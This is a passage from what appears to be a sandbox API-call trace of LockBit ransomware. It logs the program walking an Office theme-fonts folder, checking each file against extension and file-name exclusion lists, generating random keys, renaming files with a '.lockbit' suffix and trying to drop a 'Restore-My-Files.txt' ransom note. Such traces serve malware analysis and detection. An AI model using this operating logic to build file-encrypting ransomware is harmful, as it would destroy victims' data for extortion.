dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0196.074] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.074] malloc (_Size=0x40068) returned 0x3d70450 [0196.074] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3603) returned 1 [0196.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0196.075] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.076] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0196.076] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0196.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.081] malloc (_Size=0xc0) returned 0x1fa2ed8 [0196.081] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0196.082] free (_Block=0x1fa2ed8) [0196.082] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Technic.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.082] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.082] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.083] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69f900, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x6187c750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa69f900, ftLastWriteTime.dwHighDateTime=0x1cac1e1, nFileSizeHigh=0x0, nFileSizeLow=0xeff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Thatch.xml", cAlternateFileName="")) returned 1 [0196.083] lstrcmpiW (lpString1=".", lpString2="Thatch.xml") returned -1 [0196.083] lstrcmpiW (lpString1="..", lpString2="Thatch.xml") returned -1 [0196.083] PathFindExtensionW (pszPath="Thatch.xml") returned=".xml" [0196.083] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.083] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.084] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Thatch.xml") returned -1 [0196.084] lstrcmpiW (lpString1="ntldr", lpString2="Thatch.xml") returned -1 [0196.084] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Thatch.xml") returned -1 [0196.085] lstrcmpiW (lpString1="bootsect.bak", lpString2="Thatch.xml") returned -1 [0196.085] lstrcmpiW (lpString1="autorun.inf", lpString2="Thatch.xml") returned -1 [0196.085] lstrcmpiW (lpString1="thumbs.db", lpString2="Thatch.xml") returned 1 [0196.085] lstrcmpiW (lpString1="iconcache.db", lpString2="Thatch.xml") returned -1 [0196.085] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.085] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml") returned=".xml" [0196.085] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.085] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.085] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.086] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.086] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.086] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.086] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.086] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.086] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.086] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml.lockbit") returned 84 [0196.086] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\thatch.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.087] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.087] malloc (_Size=0x40068) returned 0x3df0008 [0196.087] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3839) returned 1 [0196.087] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.088] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.088] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.088] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.089] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.095] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.095] malloc (_Size=0xbe) returned 0x1fa2ed8 [0196.095] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0196.096] free (_Block=0x1fa2ed8) [0196.096] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Thatch.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.096] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.096] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.096] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd4d0a00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd4d0a00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x0, dwReserved1=0x0, cFileName="Trek.xml", cAlternateFileName="")) returned 1 [0196.096] lstrcmpiW (lpString1=".", lpString2="Trek.xml") returned -1 [0196.096] lstrcmpiW (lpString1="..", lpString2="Trek.xml") returned -1 [0196.096] PathFindExtensionW (pszPath="Trek.xml") returned=".xml" [0196.096] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.096] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.097] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0196.098] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Trek.xml") returned -1 [0196.098] lstrcmpiW (lpString1="ntldr", lpString2="Trek.xml") returned -1 [0196.098] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Trek.xml") returned -1 [0196.098] lstrcmpiW (lpString1="bootsect.bak", lpString2="Trek.xml") returned -1 [0196.098] lstrcmpiW (lpString1="autorun.inf", lpString2="Trek.xml") returned -1 [0196.099] lstrcmpiW (lpString1="thumbs.db", lpString2="Trek.xml") returned -1 [0196.099] lstrcmpiW (lpString1="iconcache.db", lpString2="Trek.xml") returned -1 [0196.099] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0196.099] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml") returned=".xml" [0196.099] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0196.099] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0196.099] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0196.100] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0196.100] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml.lockbit") returned 82 [0196.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\trek.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0196.104] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.105] malloc (_Size=0x40068) returned 0x3f70048 [0196.105] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3616) returned 1 [0196.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.105] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0196.105] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.106] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0196.106] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0196.112] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.112] malloc (_Size=0xba) returned 0x1fa2ed8 [0196.112] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xba, FileInformationClass=0xa) returned 0x0 [0196.113] free (_Block=0x1fa2ed8) [0196.113] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Trek.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0196.113] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0196.113] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.115] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe7e3700, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x528d0030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe7e3700, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe19, dwReserved0=0x0, dwReserved1=0x0, cFileName="Urban.xml", cAlternateFileName="")) returned 1 [0196.115] lstrcmpiW (lpString1=".", lpString2="Urban.xml") returned -1 [0196.115] lstrcmpiW (lpString1="..", lpString2="Urban.xml") returned -1 [0196.115] PathFindExtensionW (pszPath="Urban.xml") returned=".xml" [0196.115] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0196.115] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0196.115] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0196.115] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0196.115] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0196.115] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0196.116] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0196.117] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0196.117] 